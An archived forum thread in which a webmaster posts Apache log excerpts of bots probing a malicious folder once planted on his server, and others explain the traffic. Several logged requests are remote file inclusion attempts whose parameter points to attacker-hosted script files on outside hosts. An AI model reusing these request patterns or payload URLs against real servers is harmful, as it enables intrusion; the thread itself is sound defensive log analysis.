login | register | shoutbox

 What happened to the Messenger Plus! forums on msghelp.net?
Shoutbox » MsgHelp Archive » Skype & Technology » Tech Talk » Some assistance with Apache log excerpts

Some assistance with Apache log excerpts
Author: Message:
MeEtc
Patchou's look-alike
*****

Avatar
In the Shadow Gallery once again

Posts: 2200
Reputation: 60
38 / Male / Flag
Joined: Nov 2004
Status: Away
O.P. Some assistance with Apache log excerpts
code:
157.55.48.122 - - [08/Jun/2012:17:42:44 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2757 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
187.40.24.226 - - [18/Jun/2012:17:05:03 -0400] "GET /euhsd/show.php?pg=http://wikiteca.iesb.br/wikiteca/NewDir/opa.txt? HTTP/1.1" 404 2716 "-" "Mozilla/3.0 (compatible; Indy Library)"
157.55.109.246 - - [20/Jun/2012:07:51:12 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2764 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
200.243.30.2 - - [22/Jun/2012:16:05:18 -0400] "GET /euhsd/show.php?pg=http://www.uniaogaucha.org/images/galeria/ab2k1/upx.txt? HTTP/1.1" 404 2653 "-" "-"
186.194.6.158 - - [24/Jun/2012:10:23:14 -0400] "GET /euhsd/show.php?pg=http://euribors.com/send.txt? HTTP/1.1" 404 2678 "-" "Mozilla/3.0 (compatible; Indy Library)"
95.132.186.112 - - [27/Jun/2012:16:03:14 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 3006 "http://extrabot.com/help/tratygajiruboha.htm" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
95.132.186.112 - - [27/Jun/2012:16:03:15 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 3006 "http://extrabot.com/help/tratygajiruboha.htm" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
95.132.186.112 - - [27/Jun/2012:16:03:17 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 3006 "http://extrabot.com/help/tratygajiruboha.htm" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
157.55.48.122 - - [06/Jul/2012:05:56:07 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2726 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
157.55.109.245 - - [08/Jul/2012:04:14:05 -0400] "GET /euhsd/show.php?pg=650642650642 HTTP/1.1" 404 2758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
78.158.11.226 - - [12/Jul/2012:09:30:07 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.0" 404 2857 "http://sameid.net/domain/yetanothersig.com/" "Lynx/2.8.5rel.1 libwww-FM/2.14FC SSL-MM/1.4.1b OpenSSL/0.9.7d-dev"
157.55.109.245 - - [13/Jul/2012:19:44:22 -0400] "GET /euhsd/show.php?pg=897130897130 HTTP/1.1" 404 2758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
94.23.225.68 - - [22/Jul/2012:08:22:11 -0400] "GET /euhsd/show.php?pg=853806853806 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
94.23.225.68 - - [22/Jul/2012:08:22:11 -0400] "GET /euhsd/show.php?pg=853806853806 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
157.56.93.231 - - [25/Jul/2012:08:16:53 -0400] "GET /euhsd/show.php?pg=650642650642 HTTP/1.1" 404 2763 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
157.56.93.226 - - [26/Jul/2012:08:58:55 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2761 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
157.56.93.218 - - [26/Jul/2012:19:54:45 -0400] "GET /euhsd/show.php?pg=897130897130 HTTP/1.1" 404 2761 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
199.187.122.90 - - [27/Jul/2012:22:11:03 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 2727 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
189.48.123.38 - - [03/Aug/2012:12:44:44 -0400] "GET /euhsd/show.php?pg=http://wikiteca.iesb.br/wikiteca/newdir/opa.txt?&&r=s& HTTP/1.1" 404 2643 "-" "-"
94.23.225.68 - - [05/Aug/2012:19:19:03 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
94.23.220.161 - - [06/Aug/2012:16:05:55 -0400] "GET /euhsd/show.php?pg=853806853806 HTTP/1.1" 404 2612 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
94.23.225.68 - - [19/Aug/2012:00:04:21 -0400] "GET /euhsd/show.php?pg=594585594585 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"

the folder /euhsd/ was a malicious folder of files placed on my webserver a few years back when I got a virus that copied my FTP password. I have noticed that it still tries to get a lot of attention. I only looked through 3 months of logs, but I could go back more if needed. Is it possible to help track down what the source of this is? And no, I did not keep a copy of the files that were in the folder.
[Image: signature/]     [Image: sharing.png]
I cannot hear you. There is a banana in my ear.
08-28-2012 09:19 PM
Profile PM Web Find Quote Report
Menthix
forum admin
*******

Avatar

Posts: 5537
Reputation: 102
40 / Male / Flag
Joined: Mar 2002
RE: Some assistance with Apache log excerpts
Well, it is still listed in Google, and possibly others: https://encrypted.google.com/search?q=inurl%3A%2Feuhsd%2Fshow.php

Those hitting it are probably individuals/bots/botnets who look for signs of infected sites on search engines and try to get in your server. But since everything 404s you shouldn't have anything to worry about.

Some bots (quite a lot actually) also just try common malware paths on random sites BTW. If you try a massive load a day you'll get lucky sooner or later :p.

EDIT:
All those 157.* ones are legit Microsoft IPs BTW, MSN/Bing bots trying to index your site.
(it kinda annoys me how long and often search engines keep hammering 404 URLs these days... in the same kind of situation with a site of mine and google)

This post was edited on 08-28-2012 at 09:43 PM by Menthix.
Finish the problem
Menthix.net | Contact Me
08-28-2012 09:38 PM
Profile E-Mail PM Web Find Quote Report
MeEtc
Patchou's look-alike
*****

Avatar
In the Shadow Gallery once again

Posts: 2200
Reputation: 60
38 / Male / Flag
Joined: Nov 2004
Status: Away
O.P. RE: Some assistance with Apache log excerpts
one of the get params is the URL http://wikiteca.iesb.br/wikiteca/newdir/opa.txt. rather interesting contents.
[Image: signature/]     [Image: sharing.png]
I cannot hear you. There is a banana in my ear.
08-28-2012 10:45 PM
Profile PM Web Find Quote Report
blessedguy
Skinning Contest Winner
*****


Posts: 1762
Reputation: 25
31 / Male / Flag
Joined: Jan 2008
RE: Some assistance with Apache log excerpts
quote:
Originally posted by MeEtc
one of the get params is the URL http://wikiteca.iesb.br/wikiteca/newdir/opa.txt. rather interesting contents.
Replying! ops!!!
[Image: Empty.png]
08-28-2012 11:44 PM
Profile PM Web Find Quote Report
« Next Oldest Return to Top Next Newest »


Threaded Mode | Linear Mode
View a Printable Version
Send this Thread to a Friend
Subscribe | Add to Favorites
Rate This Thread:

Forum Jump:

Forum Rules:
You cannot post new threads
You cannot post replies
You cannot post attachments
You can edit your posts 		HTML is Off
myCode is On
Smilies are On
[img] Code is On